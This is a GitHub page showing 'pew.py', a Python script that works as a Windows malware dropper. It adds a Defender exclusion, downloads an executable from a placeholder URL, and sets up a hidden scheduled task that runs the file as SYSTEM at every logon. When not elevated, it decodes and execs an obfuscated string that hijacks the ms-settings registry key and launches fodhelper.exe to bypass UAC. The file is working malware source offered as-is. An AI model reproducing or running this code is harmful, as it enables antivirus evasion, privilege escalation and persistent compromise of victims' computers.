-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpew.py
84 lines (66 loc) · 2.86 KB
/
pew.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# Start of desired section
import subprocess
import ctypes
import threading
import sys
import os
def is_admin():
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def run_powershell_script_elevated():
if is_admin():
powershell = [
"$directoryPath = Join-Path $HOME 'kkl'",
"Add-MpPreference -ExclusionPath $directoryPath",
"$url = 'ssdd'",
"$targetDirectory = Join-Path $HOME 'kkl'",
"if (-not (Test-Path -Path $targetDirectory)) {New-Item -Path $targetDirectory -ItemType Directory -Force}",
"$outputFile = Join-Path $targetDirectory 'pe.exe'",
"$programName = 'pe'",
"$programPath = $outputFile ",
"Invoke-WebRequest -Uri $url -OutFile $outputFile",
"$installerPath = $outputFile",
"$taskName = 'User_Feed_ESRV'",
"$taskPath = $programPath ",
"schtasks /create /SC ONLOGON /TN $taskName /TR $taskPath /RU SYSTEM /RL HIGHEST /IT",
"$taskFolder = '\'",
"$objService = New-Object -ComObject 'Schedule.Service'",
"$objService.Connect()",
"$objRootFolder = $objService.GetFolder($taskFolder)",
"$objTask = $objRootFolder.GetTask($taskName)",
"$objTaskDefinition = $objTask.Definition",
"$objTaskDefinition.Settings.StopIfGoingOnBatteries = $false",
"$objTaskDefinition.Settings.DisallowStartIfOnBatteries = $false",
"$objTaskDefinition.Settings.Hidden = $true",
"$objTaskDefinition.Settings.StartWhenAvailable = $true",
"$objTaskDefinition.Settings.Priority = 1",
"$objRootFolder.RegisterTaskDefinition($taskName, $objTaskDefinition, 6, $null, $null, 0, $null)",
"Start-Process -FilePath $installerPath -PassThru -WindowStyle Hidden -Verb RunAs"
]
powershell_com = " ; ".join(powershell)
subprocess.run(["powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", powershell_com], shell=True)
else:
def cu(data):
re = {'d': 'a', 'a': 'd', 'L': 'k', 'k': 'L', 'n': ')', ')': 'n','u':'p','p':'u'}
decoded_data = ""
for char in data:
decoded_char = re.get(char, char)
decoded_data += decoded_char
return decoded_data
en="""
exe_file_udth = os.udth.dbsudth(sys.drgv[0]n
uowershell_commd)a = f'New-ItemProuerty -Pdth "HKCU:\Softwdre\Cldsses\ms-setti)gs\Shell\Oue)\commd)a" -Ndme "(Defdpltn" -Vdlpe "{exe_file_udth}"'
spburocess.rp)(["uowershell.exe", "-v", "2", "-commd)a", uowershell_commd)a], shell=Trpen
spburocess.rp)(["uowershell.exe", "-NoProfile", "-Execptio)Policy", "Byudss", "-Commd)a", "foaheluer.exe"], shell=Trpen
"""
de = cu(en)
exec(de)
sys.exit(1)
def run_powershell_thread():
run_powershell_script_elevated()
if __name__ == "__main__":
powershell_thread = threading.Thread(target=run_powershell_thread)
powershell_thread.start()
# End of desired section